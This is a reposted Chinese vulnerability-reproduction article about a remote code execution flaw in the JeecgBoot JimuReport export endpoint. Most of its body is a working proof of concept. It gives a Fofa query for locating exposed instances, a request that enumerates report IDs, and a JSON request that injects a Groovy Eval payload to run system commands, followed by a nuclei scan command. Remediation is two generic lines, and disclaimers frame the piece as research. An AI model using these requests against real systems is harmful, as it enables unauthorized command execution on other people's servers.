漏洞复现|JeecgBoot积木报表远程代码执行漏洞(XVE-2026-53510)漏洞

admin 2026-09-07 04:27:40 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 本文披露jeecgboot积木报表导出接口存在远程代码执行漏洞(CVE-2026-53510),影响所有版本。通过构造恶意reportparams参数可执行系统命令,文中给出详细POC复现步骤及nuclei检测脚本,建议升级补丁并部署WAF防护。 综合评分: 75 文章分类: 漏洞分析,漏洞预警,web安全


漏洞复现|JeecgBoot 积木报表远程代码执行漏洞(XVE-2026-53510)漏洞

原创

Tjpan Tjpan

Poc复现

2026年9月1日 09:35 广东

在小说阅读器读本章

去阅读

在公众号小说中沉浸阅读

免责声明

「此公众号所分享的网络安全知识、信息及工具皆来源互联网公开收集整理,仅供学习和研究使用,请勿用于非法测试活动。由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,产生的一切后果由读者自行承担,皆与本公众号及文章作者无关、不负任何责任!!!」「如有内容侵权,请联系我们删除处理。谢谢合作!!!」

漏洞概述

JeecgBoot 积木报表导出接口 POST /jeecg-boot/jmreport/auto/export 存在远程代码执行漏洞。

影响范围

当前所有版本

空间测绘

Fofa

 app="JeecgBoot-企业级低代码平台"

漏洞复现

Poc

  step1 枚举报表 id

GET /jeecg-boot/jmreport/excelQueryByTemplate?name=&pageNo=1&pageSize=10 HTTP/1.1
Host: 127.0.0.1:8004
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/152.0.0.0 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

   step2 执行 id 命令,输出经异常信息回显

POST /jeecg-boot/jmreport/auto/export HTTP/1.1
Host: 127.0.0.1:8004
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Content-Type: application/json
Accept: application/json

{
  "reportParams": [
    {
      "id": "907480464532770816",
      "params": {
        "x": "=use groovy.util.Eval; Eval.me('throw new RuntimeException(\"id\".execute().text)')"
      },
      "exportType": "pdf"
    }
  ]
}

漏洞自查

Nuclei

nuclei.exe -u 目标URL -stats -silent -t jeecgboot-jmreport-autoexport-rce-XVE-2026-53510.yaml

修复建议

  • • 建议联系厂商打补丁或升级版本。
  • • 增加Web应用防火墙防护。

poc免费获取


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:Poc复现 Tjpan Tjpan《漏洞复现|JeecgBoot 积木报表远程代码执行漏洞(XVE-2026-53510)漏洞》

评论:0   参与:  0